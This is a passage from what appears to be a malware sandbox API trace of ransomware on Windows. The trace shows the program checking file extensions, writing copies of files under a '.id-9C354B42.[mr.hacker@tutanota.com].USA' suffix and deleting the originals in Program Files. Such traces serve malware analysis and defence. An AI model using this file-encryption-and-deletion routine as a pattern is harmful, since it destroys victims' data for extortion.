Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.628] lstrlenW (lpString=".dbf") returned 4 [0051.628] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.628] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.628] lstrlenW (lpString=".1cd") returned 4 [0051.628] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.628] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.629] lstrlenW (lpString=".jpg") returned 4 [0051.629] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.629] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0051.629] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0051.630] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0051.630] lstrlenW (lpString=".doc") returned 4 [0051.630] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.630] lstrlenW (lpString=".docx") returned 5 [0051.630] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0051.630] lstrlenW (lpString=".pdf") returned 4 [0051.630] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.630] lstrlenW (lpString=".xls") returned 4 [0051.630] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.630] lstrlenW (lpString=".xlsx") returned 5 [0051.630] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0051.630] lstrlenW (lpString=".ppt") returned 4 [0051.630] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.630] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0051.630] lstrlenW (lpString=".zip") returned 4 [0051.630] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.630] lstrlenW (lpString=".rar") returned 4 [0051.630] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.630] lstrlenW (lpString=".bz2") returned 4 [0051.630] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.630] lstrlenW (lpString=".7z") returned 3 [0051.630] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.630] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0051.630] lstrlenW (lpString=".dbf") returned 4 [0051.630] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.630] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0051.630] lstrlenW (lpString=".1cd") returned 4 [0051.630] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.630] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0051.630] lstrlenW (lpString=".jpg") returned 4 [0051.630] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.631] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0051.631] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0051.631] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0051.631] lstrlenW (lpString=".doc") returned 4 [0051.631] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.631] lstrlenW (lpString=".docx") returned 5 [0051.631] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0051.631] lstrlenW (lpString=".pdf") returned 4 [0051.631] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.631] lstrlenW (lpString=".xls") returned 4 [0051.631] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.631] lstrlenW (lpString=".xlsx") returned 5 [0051.631] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0051.631] lstrlenW (lpString=".ppt") returned 4 [0051.631] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.631] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0051.631] lstrlenW (lpString=".zip") returned 4 [0051.631] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.631] lstrlenW (lpString=".rar") returned 4 [0051.631] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.631] lstrlenW (lpString=".bz2") returned 4 [0051.631] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.631] lstrlenW (lpString=".7z") returned 3 [0051.631] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.631] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0051.631] lstrlenW (lpString=".dbf") returned 4 [0051.631] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.631] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0051.632] lstrlenW (lpString=".1cd") returned 4 [0051.632] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.632] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0051.632] lstrlenW (lpString=".jpg") returned 4 [0051.632] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.632] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0051.632] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 81 [0051.632] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 81 [0051.632] lstrlenW (lpString=".doc") returned 4 [0051.632] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.632] lstrlenW (lpString=".docx") returned 5 [0051.632] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0051.632] lstrlenW (lpString=".pdf") returned 4 [0051.632] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.632] lstrlenW (lpString=".xls") returned 4 [0051.632] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.632] lstrlenW (lpString=".xlsx") returned 5 [0051.632] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0051.632] lstrlenW (lpString=".ppt") returned 4 [0051.632] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.632] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 81 [0051.632] lstrlenW (lpString=".zip") returned 4 [0051.632] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.632] lstrlenW (lpString=".rar") returned 4 [0051.632] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.633] lstrlenW (lpString=".bz2") returned 4 [0051.633] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.633] lstrlenW (lpString=".7z") returned 3 [0051.633] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.633] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 81 [0051.633] lstrlenW (lpString=".dbf") returned 4 [0051.633] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.633] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 81 [0051.633] lstrlenW (lpString=".1cd") returned 4 [0051.633] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.633] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 81 [0051.633] lstrlenW (lpString=".jpg") returned 4 [0051.633] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0052.259] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=25998) returned 1 [0052.260] CloseHandle (hObject=0x1f4) returned 1 [0052.260] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travel.png")) returned 0x20 [0052.260] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travel.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.260] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travel.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.260] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 61 [0052.260] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 61 [0052.260] lstrlenW (lpString=".doc") returned 4 [0052.260] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0052.260] lstrlenW (lpString=".docx") returned 5 [0052.260] lstrcmpiW (lpString1=".docx", lpString2="l.png") returned -1 [0052.260] lstrlenW (lpString=".pdf") returned 4 [0052.260] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0052.260] lstrlenW (lpString=".xls") returned 4 [0052.260] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0052.260] lstrlenW (lpString=".xlsx") returned 5 [0052.260] lstrcmpiW (lpString1=".xlsx", lpString2="l.png") returned -1 [0052.260] lstrlenW (lpString=".ppt") returned 4 [0052.260] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0052.260] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 61 [0052.261] lstrlenW (lpString=".zip") returned 4 [0052.261] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0052.261] lstrlenW (lpString=".rar") returned 4 [0052.261] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0052.261] lstrlenW (lpString=".bz2") returned 4 [0052.261] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0052.261] lstrlenW (lpString=".7z") returned 3 [0052.261] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0052.261] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 61 [0052.261] lstrlenW (lpString=".dbf") returned 4 [0052.261] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0052.261] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 61 [0052.261] lstrlenW (lpString=".1cd") returned 4 [0052.261] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0052.261] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 61 [0052.261] lstrlenW (lpString=".jpg") returned 4 [0052.261] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0052.261] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 61 [0052.261] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 61 [0052.261] lstrlenW (lpString=".doc") returned 4 [0052.261] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0052.261] lstrlenW (lpString=".docx") returned 5 [0052.261] lstrcmpiW (lpString1=".docx", lpString2="l.png") returned -1 [0052.261] lstrlenW (lpString=".pdf") returned 4 [0052.261] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0052.261] lstrlenW (lpString=".xls") returned 4 [0052.261] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0052.261] lstrlenW (lpString=".xlsx") returned 5 [0052.261] lstrcmpiW (lpString1=".xlsx", lpString2="l.png") returned -1 [0052.261] lstrlenW (lpString=".ppt") returned 4 [0052.261] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0052.262] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 61 [0052.262] lstrlenW (lpString=".zip") returned 4 [0052.262] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0052.262] lstrlenW (lpString=".rar") returned 4 [0052.262] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0052.262] lstrlenW (lpString=".bz2") returned 4 [0052.262] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0052.262] lstrlenW (lpString=".7z") returned 3 [0052.262] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0052.262] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 61 [0052.262] lstrlenW (lpString=".dbf") returned 4 [0052.262] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0052.262] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 61 [0052.262] lstrlenW (lpString=".1cd") returned 4 [0052.262] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0052.262] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 61 [0052.262] lstrlenW (lpString=".jpg") returned 4 [0052.262] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0052.262] lstrcmpiW (lpString1=".xsl", lpString2=".USA") returned 1 [0052.262] lstrlenW (lpString="Informix.xsl") returned 12 [0052.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0052.467] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=30948) returned 1 [0052.467] CloseHandle (hObject=0x160) returned 1 [0052.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl")) returned 0x20 [0052.477] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.478] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0052.478] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0052.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0052.478] GetLastError () returned 0x0 [0052.478] ReadFile (in: hFile=0x220, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x78e4, lpOverlapped=0x0) returned 1 [0052.549] WriteFile (in: hFile=0x160, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x78f0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x78f0, lpOverlapped=0x0) returned 1 [0052.551] ReadFile (in: hFile=0x220, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0052.551] WriteFile (in: hFile=0x160, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.551] SetEndOfFile (hFile=0x160) returned 1 [0052.657] CloseHandle (hObject=0x160) returned 1 [0052.657] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0052.672] SetEndOfFile (hFile=0x220) returned 1 [0052.686] CloseHandle (hObject=0x220) returned 1 [0052.686] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0052.687] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl")) returned 1 [0052.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0052.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0052.687] lstrlenW (lpString=".doc") returned 4 [0052.687] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0052.687] lstrlenW (lpString=".docx") returned 5 [0052.687] lstrcmpiW (lpString1=".docx", lpString2="x.xsl") returned -1 [0052.687] lstrlenW (lpString=".pdf") returned 4 [0052.687] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0052.687] lstrlenW (lpString=".xls") returned 4 [0052.687] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0052.687] lstrlenW (lpString=".xlsx") returned 5 [0052.687] lstrcmpiW (lpString1=".xlsx", lpString2="x.xsl") returned -1 [0052.687] lstrlenW (lpString=".ppt") returned 4 [0052.687] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0052.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0052.687] lstrlenW (lpString=".zip") returned 4 [0052.687] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0052.687] lstrlenW (lpString=".rar") returned 4 [0052.687] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0052.687] lstrlenW (lpString=".bz2") returned 4 [0052.687] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0052.687] lstrlenW (lpString=".7z") returned 3 [0052.687] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0052.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0052.687] lstrlenW (lpString=".dbf") returned 4 [0052.687] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0052.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0052.688] lstrlenW (lpString=".1cd") returned 4 [0052.688] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0052.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0052.688] lstrlenW (lpString=".jpg") returned 4 [0052.688] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0053.243] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.250] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0053.256] GetLastError () returned 0x0 [0053.256] ReadFile (in: hFile=0x208, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x1fa1, lpOverlapped=0x0) returned 1 [0053.258] WriteFile (in: hFile=0x160, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x1fb0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x1fb0, lpOverlapped=0x0) returned 1 [0053.259] ReadFile (in: hFile=0x208, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0053.259] WriteFile (in: hFile=0x160, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.260] SetEndOfFile (hFile=0x160) returned 1 [0053.260] CloseHandle (hObject=0x160) returned 1 [0053.260] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.260] SetEndOfFile (hFile=0x208) returned 1 [0053.261] CloseHandle (hObject=0x208) returned 1 [0053.261] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.261] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif")) returned 1 [0053.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0053.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0053.261] lstrlenW (lpString=".doc") returned 4 [0053.261] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.261] lstrlenW (lpString=".docx") returned 5 [0053.261] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.261] lstrlenW (lpString=".pdf") returned 4 [0053.261] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.261] lstrlenW (lpString=".xls") returned 4 [0053.261] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.261] lstrlenW (lpString=".xlsx") returned 5 [0053.262] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.262] lstrlenW (lpString=".ppt") returned 4 [0053.262] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0053.262] lstrlenW (lpString=".zip") returned 4 [0053.262] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.262] lstrlenW (lpString=".rar") returned 4 [0053.262] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.262] lstrlenW (lpString=".bz2") returned 4 [0053.262] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.262] lstrlenW (lpString=".7z") returned 3 [0053.262] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0053.262] lstrlenW (lpString=".dbf") returned 4 [0053.262] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0053.262] lstrlenW (lpString=".1cd") returned 4 [0053.262] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 63 [0053.262] lstrlenW (lpString=".jpg") returned 4 [0053.262] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.301] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.301] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0053.301] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, 